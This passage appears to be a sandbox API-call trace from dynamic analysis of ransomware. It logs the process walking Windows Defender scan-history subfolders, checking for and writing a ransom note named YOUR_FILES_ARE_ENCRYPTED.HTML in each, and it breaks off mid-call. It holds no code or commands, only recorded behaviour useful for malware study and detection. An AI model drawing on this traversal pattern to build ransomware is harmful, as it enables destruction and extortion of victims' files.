[0110.275] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf288254, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf288254, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf28d248, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.275] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.275] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.275] GetProcessHeap () returned 0x600000 [0110.275] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\01\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\01\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.275] GetProcessHeap () returned 0x600000 [0110.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.276] GetProcessHeap () returned 0x600000 [0110.276] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.277] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="02", cAlternateFileName="")) returned 1 [0110.277] StrStrIW (lpFirst="02", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.277] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02") returned 83 [0110.277] GetProcessHeap () returned 0x600000 [0110.277] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.278] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02" [0110.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\*" [0110.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf295d59, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.278] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf295d59, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.278] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="100015", cAlternateFileName="")) returned 1 [0110.278] StrStrIW (lpFirst="100015", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.278] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\100015") returned 90 [0110.278] PathFindExtensionW (pszPath="100015") returned="" [0110.278] lstrlenW (lpString="") returned 0 [0110.278] PathFindExtensionW (pszPath="100015") returned="" [0110.278] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="109004", cAlternateFileName="")) returned 1 [0110.278] StrStrIW (lpFirst="109004", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.278] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\109004") returned 90 [0110.278] PathFindExtensionW (pszPath="109004") returned="" [0110.278] lstrlenW (lpString="") returned 0 [0110.278] PathFindExtensionW (pszPath="109004") returned="" [0110.279] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="303", cAlternateFileName="")) returned 1 [0110.279] StrStrIW (lpFirst="303", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.279] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\303") returned 87 [0110.279] PathFindExtensionW (pszPath="303") returned="" [0110.279] lstrlenW (lpString="") returned 0 [0110.279] PathFindExtensionW (pszPath="303") returned="" [0110.279] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf295d59, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf295d59, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2993ac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.279] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf295d59, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf295d59, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2993ac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.279] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0110.279] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.279] GetProcessHeap () returned 0x600000 [0110.279] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\02\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\02\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.279] GetProcessHeap () returned 0x600000 [0110.279] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.279] GetProcessHeap () returned 0x600000 [0110.280] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.280] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x652573eb, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="03", cAlternateFileName="")) returned 1 [0110.281] StrStrIW (lpFirst="03", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.281] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03") returned 83 [0110.281] GetProcessHeap () returned 0x600000 [0110.281] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.282] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03" [0110.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\*" [0110.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2a91e7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.282] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2a91e7, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.282] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x652573eb, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x652573eb, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="324", cAlternateFileName="")) returned 1 [0110.282] StrStrIW (lpFirst="324", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.282] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\324") returned 87 [0110.282] PathFindExtensionW (pszPath="324") returned="" [0110.282] lstrlenW (lpString="") returned 0 [0110.282] PathFindExtensionW (pszPath="324") returned="" [0110.282] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2a91e7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2a91e7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2acc08, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.282] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2a91e7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2a91e7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2acc08, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.282] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.283] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.283] GetProcessHeap () returned 0x600000 [0110.283] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\03\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\03\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.284] GetProcessHeap () returned 0x600000 [0110.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.284] GetProcessHeap () returned 0x600000 [0110.284] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.285] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="04", cAlternateFileName="")) returned 1 [0110.285] StrStrIW (lpFirst="04", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.285] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04") returned 83 [0110.285] GetProcessHeap () returned 0x600000 [0110.285] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.286] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04" [0110.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\*" [0110.286] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2b7c37, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.286] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xaf2b7c37, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0110.286] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="109005", cAlternateFileName="")) returned 1 [0110.286] StrStrIW (lpFirst="109005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.286] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\109005") returned 90 [0110.286] PathFindExtensionW (pszPath="109005") returned="" [0110.286] lstrlenW (lpString="") returned 0 [0110.287] PathFindExtensionW (pszPath="109005") returned="" [0110.287] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="259", cAlternateFileName="")) returned 1 [0110.287] StrStrIW (lpFirst="259", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.287] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\259") returned 87 [0110.287] PathFindExtensionW (pszPath="259") returned="" [0110.287] lstrlenW (lpString="") returned 0 [0110.287] PathFindExtensionW (pszPath="259") returned="" [0110.287] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8433ac93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x88, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="261", cAlternateFileName="")) returned 1 [0110.287] StrStrIW (lpFirst="261", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.287] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\261") returned 87 [0110.287] PathFindExtensionW (pszPath="261") returned="" [0110.287] lstrlenW (lpString="") returned 0 [0110.287] PathFindExtensionW (pszPath="261") returned="" [0110.287] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2b685d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2b685d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2ba41c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.287] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2b685d, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf2b685d, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf2ba41c, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.287] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.287] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.287] GetProcessHeap () returned 0x600000 [0110.287] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0110.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\04\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\mput\\mputhistory\\04\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.288] GetProcessHeap () returned 0x600000 [0110.288] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0110.288] GetProcessHeap () returned 0x600000 [0110.288] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0110.289] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a531b1c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2a531b1c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x2a531b1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62eda0, dwReserved1=0x19df88, cFileName="05", cAlternateFileName="")) returned 1 [0110.289] StrStrIW (lpFirst="05", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.289] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05") returned 83 [0110.289] GetProcessHeap () returned 0x600000 [0110.289] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0110.290] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Mput\\MputHistory\\05") 